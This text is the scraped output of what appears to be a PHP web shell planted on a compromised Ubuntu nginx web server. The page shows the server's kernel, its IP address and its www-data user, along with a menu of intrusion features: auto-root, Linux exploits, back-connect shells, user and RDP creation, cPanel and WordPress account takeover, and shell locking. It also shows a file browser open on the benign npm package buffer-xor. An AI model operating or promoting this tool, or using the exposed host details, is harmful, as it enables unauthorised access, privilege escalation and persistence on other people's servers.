Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
buffer-xor /
[ HOME SHELL ]
Name
Size
Permission
Action
test
[ DIR ]
drwxr-xr-x
.npmignore
13
B
-rw-r--r--
.travis.yml
165
B
-rw-r--r--
LICENSE
1.06
KB
-rw-r--r--
README.md
1014
B
-rw-r--r--
index.js
206
B
-rw-r--r--
inline.js
38
B
-rw-r--r--
inplace.js
186
B
-rw-r--r--
package.json
931
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "buffer-xor", "version": "1.0.3", "description": "A simple module for bitwise-xor on buffers", "main": "index.js", "scripts": { "standard": "standard", "test": "npm run-script unit", "unit": "mocha" }, "repository": { "type": "git", "url": "https://github.com/crypto-browserify/buffer-xor.git" }, "bugs": { "url": "https://github.com/crypto-browserify/buffer-xor/issues" }, "homepage": "https://github.com/crypto-browserify/buffer-xor", "keywords": [ "bits", "bitwise", "buffer", "buffer-xor", "crypto", "inline", "math", "memory", "performance", "xor" ], "author": "Daniel Cousens", "license": "MIT", "devDependencies": { "mocha": "*", "standard": "*" } ,"_resolved": "https://registry.npmjs.org/buffer-xor/-/buffer-xor-1.0.3.tgz" ,"_integrity": "sha1-JuYe0UIvtw3ULm42cp7VHYVf6Nk=" ,"_from": "buffer-xor@^1.0.3" }
Close